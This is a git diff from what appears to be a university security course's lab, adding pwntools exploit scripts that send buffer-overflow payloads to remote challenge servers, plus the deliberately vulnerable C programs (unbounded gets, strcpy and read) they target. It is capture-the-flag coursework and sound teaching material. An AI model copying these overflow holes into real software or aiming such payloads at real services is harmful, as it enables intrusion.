diff --git a/pa/.gitignore b/pa/.gitignore
index 885bc07..d07f821 100644
--- a/pa/.gitignore
+++ b/pa/.gitignore
@@ -1,2 +1,3 @@
 **.vscode/
 **__pycache__/
+**.gdb_history
diff --git a/pa/lab6/chall_calling_functions.py b/pa/lab6/chall_calling_functions.py
new file mode 100644
index 0000000..1bf8a16
--- /dev/null
+++ b/pa/lab6/chall_calling_functions.py
@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25153
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*32 + b"\xf1\x86\x04\x08\n")
+conn.interactive()
diff --git a/pa/lab6/chall_match_an_exact_value.py b/pa/lab6/chall_match_an_exact_value.py
new file mode 100644
index 0000000..fa4088e
--- /dev/null
+++ b/pa/lab6/chall_match_an_exact_value.py
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25152
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("?\n")
+conn.send(b"\x55"*64 + b"dcba\n")
+conn.interactive()
diff --git a/pa/lab6/chall_return_address.py b/pa/lab6/chall_return_address.py
new file mode 100644
index 0000000..ffbf47e
--- /dev/null
+++ b/pa/lab6/chall_return_address.py
@@ -0,0 +1,12 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25154
+
+WIN_ADDR = 0x080486f1
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("'\n")
+conn.send(b"\x55"*0x12 + b"\xaa"*4 + b"\xf1\x86\x04\x08\n")
+conn.interactive()
diff --git a/pa/lab6/chall_simple_overflow.py b/pa/lab6/chall_simple_overflow.py
new file mode 100644
index 0000000..cb99bd9
--- /dev/null
+++ b/pa/lab6/chall_simple_overflow.py
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25151
+
+conn = remote(HOST, PORT)
+
+conn.recvuntil("0.\n")
+conn.send(b"\x55"*128 + b"\x01\n")
+conn.interactive()
diff --git a/pa/lab6/chall_super_secure_lottery.py b/pa/lab6/chall_super_secure_lottery.py
new file mode 100644
index 0000000..ac0dde6
--- /dev/null
+++ b/pa/lab6/chall_super_secure_lottery.py
@@ -0,0 +1,10 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25161
+
+conn = remote(HOST, PORT)
+conn.recvuntil(b":")
+pl = b"\x55"*(64)
+conn.send(pl)
+print(conn.recvline())
diff --git a/pa/lab6/chall_super_secure_system.py b/pa/lab6/chall_super_secure_system.py
new file mode 100644
index 0000000..e987988
--- /dev/null
+++ b/pa/lab6/chall_super_secure_system.py
@@ -0,0 +1,15 @@
+from pwn import *
+
+HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
+PORT = 25155
+
+WIN_ADDR = p32(0x080487d9)
+EBX = p32(0x804a001) # Has NULL byte
+EBP = p32(0xffffcdd8)
+
+#conn = process("./check")
+conn = remote(HOST, PORT)
+pl = b"\x55"*0x24 + EBX + EBP + WIN_ADDR
+input()
+conn.send(pl)
+conn.interactive()
diff --git a/pa/lab6/check b/pa/lab6/check
new file mode 100755
index 0000000..002c2eb
Binary files /dev/null and b/pa/lab6/check differ
diff --git a/pa/lab6/check.c b/pa/lab6/check.c
new file mode 100644
index 0000000..969ebcb
--- /dev/null
+++ b/pa/lab6/check.c
@@ -0,0 +1,30 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+int check_password(char* password) {
+  char buffer[32];
+
+  strcpy(buffer, password);
+
+  if(strcmp(buffer, getflag()) == 0)
+    return 1;
+
+  return 0;
+}
+
+int main() {
+  init();
+
+  char pass[64] = {0};
+  // we know how to make this secure. No gets in here.
+  read(0, pass, 63);
+
+  if(check_password(pass)){
+      printf("Welcome back! Here is the secret flag that you already knew: %s\n", getflag());
+  } else {
+      printf("Unauthorized user/passwd\n");
+  }
+}
diff --git a/pa/lab6/functions b/pa/lab6/functions
new file mode 100644
index 0000000..0ad9bfb
Binary files /dev/null and b/pa/lab6/functions differ
diff --git a/pa/lab6/functions.c b/pa/lab6/functions.c
new file mode 100644
index 0000000..9603c36
--- /dev/null
+++ b/pa/lab6/functions.c
@@ -0,0 +1,27 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+void win() {
+  printf("Congratulations, you win!!! You successfully changed the code flow\n");
+  printf("Flag: %s\n", getflag());
+}
+
+int main() {
+  init();
+  int (*fp)();
+  char buffer[32];
+
+  fp = 0;
+
+  printf("You win this game if you are able to call the function win. Can you do it?\n");
+
+  gets(buffer);
+
+  if(fp) {
+      printf("Calling function pointer... jumping to %p\n", fp);
+      fp();
+  }
+}
diff --git a/pa/lab6/lottery b/pa/lab6/lottery
new file mode 100755
index 0000000..626d1c0
Binary files /dev/null and b/pa/lab6/lottery differ
diff --git a/pa/lab6/lottery.c b/pa/lab6/lottery.c
new file mode 100644
index 0000000..3b9cded
--- /dev/null
+++ b/pa/lab6/lottery.c
@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include "general.h"
+
+#define GUESS_SIZE 64
+#define LOTTERY_LEN 8
+
+void run_lottery(const char* prize) {
+    char guess[LOTTERY_LEN] = {0};
+
+    while (1) {
+        printf("What is your guess: ");
+        read(0, guess, GUESS_SIZE);
+
+        if (!memcmp(prize, guess, LOTTERY_LEN)) {
+            printf("Congratulations! You won the lottery: %s\n", getflag());
+        } else {
+            puts("Wrong guess. Do you want to play again?");
+        }
+    }
+}
+
+int main() {
+    init();
+    char lottery[LOTTERY_LEN];
+
+    int fd = open("/dev/urandom", O_RDONLY);
+    read(fd, lottery, LOTTERY_LEN);
+    close(fd);
+
+    run_lottery(lottery);
+}
diff --git a/pa/lab6/match.c b/pa/lab6/match.c
new file mode 100644
index 0000000..c81ef9f
--- /dev/null
+++ b/pa/lab6/match.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+int main() {
+  init();
+  int test;
+  char buffer[64];
+
+  printf("You win this game if you can change variable test to the value 0x61626364. Have you noticed that the ascii code of 'a' is 0x61?\n");
+
+  test = 0;
+  gets(buffer);
+
+  if (test == 0x61626364) {
+      printf("Congratulations, you win!!! You correctly got the variable to the right value\n");
+      printf("Flag: %s\n", getflag());
+  } else {
+      printf("Try again, you got 0x%08x, instead of 0x61626364\n", test);
+  }
+}
diff --git a/pa/lab6/return b/pa/lab6/return
new file mode 100644
index 0000000..b6e2617
Binary files /dev/null and b/pa/lab6/return differ
diff --git a/pa/lab6/return.c b/pa/lab6/return.c
new file mode 100644
index 0000000..2297db0
--- /dev/null
+++ b/pa/lab6/return.c
@@ -0,0 +1,22 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+#include "general.h"
+
+void win() {
+  printf("Congratulations, you win!!! You successfully changed the code flow\n");
+  printf("Flag, %s\n", getflag());
+}
+
+void challenge() {
+  char buffer[10];
+  printf("You win this game if you are able to call the function win.'\n");
+  gets(buffer);
+}
+ 
+int main() {
+  init();
+  challenge();
+  return 0;
+}
diff --git a/pa/lab6/simple b/pa/lab6/simple
new file mode 100755
index 0000000..99a5b92
Binary files /dev/null and b/pa/lab6/simple differ
diff --git a/pa/lab6/simple.c b/pa/lab6/simple.c
new file mode 100644
index 0000000..f3d81d4
--- /dev/null
+++ b/pa/lab6/simple.c
@@ -0,0 +1,23 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include "general.h"
+
+int main() {
+  init();
+  int test;
+  char buffer[128];
+
+  printf("You win this game if you change variable test to a value different from 0.\n");
+
+  test = 0;
+  gets(buffer);
+
+  if(test != 0) {
+      printf("YOU WIN!\n");
+      printf("Flag: %s\n", getflag());
+  } else {
+      printf("Try again...\n");
+  }
+}
diff --git a/pa/writeups b/pa/writeups
index 6b92b0e..03cdb0c 160000
--- a/pa/writeups
+++ b/pa/writeups
@@ -1 +1 @@
-Subproject commit 6b92b0e9830770b3a35cd976e2fe411cee446933
+Subproject commit 03cdb0cdff344cedc119bdbeacb1e811b663b018